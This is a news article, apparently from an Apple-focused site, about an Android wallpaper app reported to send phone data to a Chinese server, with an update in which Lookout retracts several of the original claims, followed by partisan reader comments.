An app distributed by Google's Android Market has collected private data from millions of users and forwarded it to servers China, validating Apple's uniquely strong stance on mobile security in the iPhone App Store.

The exploit, tied to an app that appeared to simply load free custom background wallpapers, was downloaded "anywhere from 1.1 million to 4.6 million times. The exact number isnt known because the Android Market doesnt offer precise data," according to a report by Dean Takahashi of VentureBeat.

The app "collects a users browsing history, text messages, your phones SIM card number, subscriber identification, and even your voice mail password. It sends the data to a web site, www.imnet.us. That site is evidently owned by someone in Shenzhen, China," the report noted (see the update by Lookout below).

The data upload was only discovered afterward, through forensics performed by mobile security firm named Lookout which sells virus and malware protection software for Android, Windows Mobile and BlackBerry devices. The problem was announced at the Black Hat security conference being held in Las Vegas.

(Update: Lookout has clarified in followup comments with AppleInsider that the intent of their "App Genome Project" research was to "identify security threats in the wild and provide insight into how applications are accessing personal data and other phone resources."

The group noted that the Android wallpaper app was "not proven to be malicious," but that the app does "ask the user for specific information around the phone details and that information is transferred to a server [in China]."

Correcting the original VentureBeat story, Lookout stated that "the apps from these developers send several pieces of sensitive data to a server, including a devices phone number, subscriber identifier, and currently programmed voicemail number. The applications we analyzed did not access a devices SMS messages, browsing history, or voicemail password (unless a user manually programmed the voicemail number on the device to include the voicemail password)."

Lookout also reiterated there is "no proof of malicious intent and in the past apps have been a bit overzealous in getting access to sensitive data with no ill intent." Lookout compared the Android wallpaper app copying local data to a Chinese server with a recent App Store title that purported to be a flashlight app while actually including a hidden SOCKS proxy that could be used for tethering.

Lookout added that it hasn't "yet" published a report detailing the Android wallpaper app, suggesting that it is continuing to look at the situation.)

Mobile data theft on the increase

The issue recalls a recent AT&T website leak that could hypothetically have enabled a malicious hacker to access 144 thousand of iPad 3G user's email addresses.

However, the Android app data theft was actually perpetrated by malicious hackers and not just demonstrated by researchers; it involves far more sensitive data; and affected far more victims--by more than an order of magnitude.

iOS vs Android in app security

Apps on any platform can access personal data and forward that data to an external server, but the Lookout research found that 47 percent of the selection of Android apps it looked at incorporated third party code (which may include malicious functions), while only 23 percent of analyzed iPhone apps did.

Apple also approves iOS apps through a strict vetting process before listing them in the App Store, while Google's Android Market app security involves simply warning the user that an app needs permissions to perform certain functions during the install.

Unlike other mobile platforms secured by Lookout, Apple's iOS platform doesn't have a live virus problem because third party iPhone apps can only be distributed through Apple's curated App Store, and apps are forced to run in a segregated sandbox environment where they can't infect the system. That doesn't necessarily mean iOS apps can't forward user data inappropriately however; Apple has discovered and pulled apps that have violated its privacy policies.

Apps must also be signed by a certificate created by Apple, which makes it much harder for malicious developers to anonymously distribute software designed to cause problems or steal data. Apple's security measures also make such efforts less attractive financially, despite the iOS platform's installed base being much larger than Android's.

Exploitable vulnerabilities in the iOS platform have been reported elsewhere, including the Safari browser, but crafting a malicious attack via the browser requires luring users to a malicious site rather than simply distributing a bad app that appears to be useful and genuine.

Lookout chief executive John Hering said in the report that "he believes both Google and Apple are on top of policing their app stores, particularly when there are known malware problems with apps," but the report noted it's "unclear what happens" when apps don't actually do what they represent.

Apple on the money when saying Jailbreaking wiil lead to piracy, viruses, and cause the IPHONE to lose its SECURE environment.
Sure some people find jailbreaking an advantage. But lets think about all the downside as well.

Wait wait wait one damn second. You're trying to tell me that an 'open', unregulated, app store might have malicious apps on it from China? And these apps would collect personal and private data then transmit it to China? NO FREAKING WAY. Google has always been known for protecting user data and sees protecting it's customers as a priority. Android is simply the safest phone OS on the market! <insert sarcastic wit here> This while story comes as no surprise.... <rolls eyes>

The exploit, tied to an app that appeared to simply load free custom background wallpapers, was downloaded "anywhere from 1.1 million to 4.6 million times. The exact number isn’t known because the Android Market doesn’t offer precise data," according to a report by Dean Takahashi of VentureBeat.

The app "collects a user’s browsing history, text messages, your phone’s SIM card number, subscriber identification, and even your voice mail password. It sends the data to a web site, www.imnet.us. That site is evidently owned by someone in Shenzhen, China," the report noted.

I wonder if any EFF members downloaded the pretty wallpaper onto their android phones.

Wait wait wait one damn second. You're trying to tell me that an 'open', unregulated, app store might have malicious apps on it from China? And these apps would collect personal and private data then transmit it to China? NO FREAKING WAY. Google has always been known for protecting user data and sees protecting it's customers as a priority. Android is simply the safest phone OS on the market! <insert sarcastic wit here> This while story comes as no surprise.... <rolls eyes>

For those the jailbreak their iPhones they are more likely to get played by malware writers. Now that it is legal to jailbreak I'm sure more people will do it. We may even see a lawsuit from jailbroken iPhone users claiming Apple didn't protect them enough.

Apple on the money when saying Jailbreaking wiil lead to piracy, viruses, and cause the IPHONE to lose its SECURE environment.
Sure some people find jailbreaking an advantage. But lets think about all the downside as well.

From my encounters, the main reason people jailbreak is to get on T-Mobile and away from AT&T. Then they can tether and do all kinds of things AT&T doesn't like. Get the iPhone on T-Mobile and many will stop jailbreaking as it wouldn't be worth it then.

Ha ha!!!!!!
Eric Shmidt tried his damnedest to derail Apple by lauding the so-called freedom of OPEN SOURCE in contrast to Apple's so-called draconian(whatever Eric) app acceptance practice. Not that anything is wrong with open source per se but we all know Eric was trying to win over people. This is what we all knew was going to happen. Did you not see the writing on the walls?
There are too many fu***** people thinking Apple is some dumb country bumpkin outfit. THEY AIN'T!!!!!!!
Apple is a world class, and I stress world class, technology company.
Job is surrounded by the best and brightest. He gets his information form the source, He knows what the hell he's talking about. The problem is the rest of the industry doesn't want YOU to know the truth. Sh** happens!!!!!

Be patient. It takes some time to make sure one's personal data has not been stolen and exploited, and then it takes more time to come up with a rationalization or some way of muddying the waters so that the whole setup of the Android Market bears no blame.

I’m looking forward to the counterargument. I can’t think of a single angle that is pro-Android on this one.

Quote:

Originally Posted by peter02l

Millions affected. Not a single one complains. And no lawsuits! And yet some of these Android users (who don't even own an iPhone 4) are constantly finding a new thing about the iPhone to carp about.

It is amazing that one modern mobile OS gets denigrate for even the simplest slip up and the other modern mobile OS can make huge errors in design that are well known to fail and barely anyone will ever know it existed despite the number of people it affects.

Dick Applebaum on whether the iPad is a personal computer: "BTW, I am posting this from my iPad pc while sitting on the throne... personal enough for you?"

No issues with the 3 Android phones and two Android tablets in my home, but the spouse's iPhone 4 appears to be dropping calls a bit more than usual today (as indicated by her angrily exclaiming as much upon walking through the door this evening), and the old iPhone 3g didn't take too kindly to that last firmware update.

No issues with the 3 Android phones and two Android tablets in my home, but the spouse's iPhone 4 appears to be dropping calls a bit more than usual today (as indicated by her angrily exclaiming as much upon walking through the door this evening), and the old iPhone 3g didn't take too kindly to that last firmware update.

Im looking forward to the counterargument. I cant think of a single angle that is pro-Android on this one.

It is amazing that one modern mobile OS gets denigrate for even the simplest slip up and the other modern mobile OS can make huge errors in design that are well known to fail and barely anyone will ever know it existed despite the number of people it affects.

I think I know the argument Android fanboys will spout: "They should've checked the source code! It's their own fault they didn't. Noobs! I want Android to be mainstream but want it to remain exclusive to tech nerds as well! Just like Linux!" And yet, Apple users are called the elitists.

Seriously though, I feel bad for all the Android users (who aren't fanboys and most likely only use an Android because their network doesn't have an iPhone) whose information has been compromised in the name of OPEN.

Android. The new "Windows" for the mobile environment. Time to start including even more crapware like anti-malware, anti-virus, anti-everything just like its Windows counterpart.

Well, they do love to bleat about how this is the Mac/PC wars all over. I guess they're trying to imitate the PC as much as possible, down to the insecurity of the platform and even the contempt its users have for it!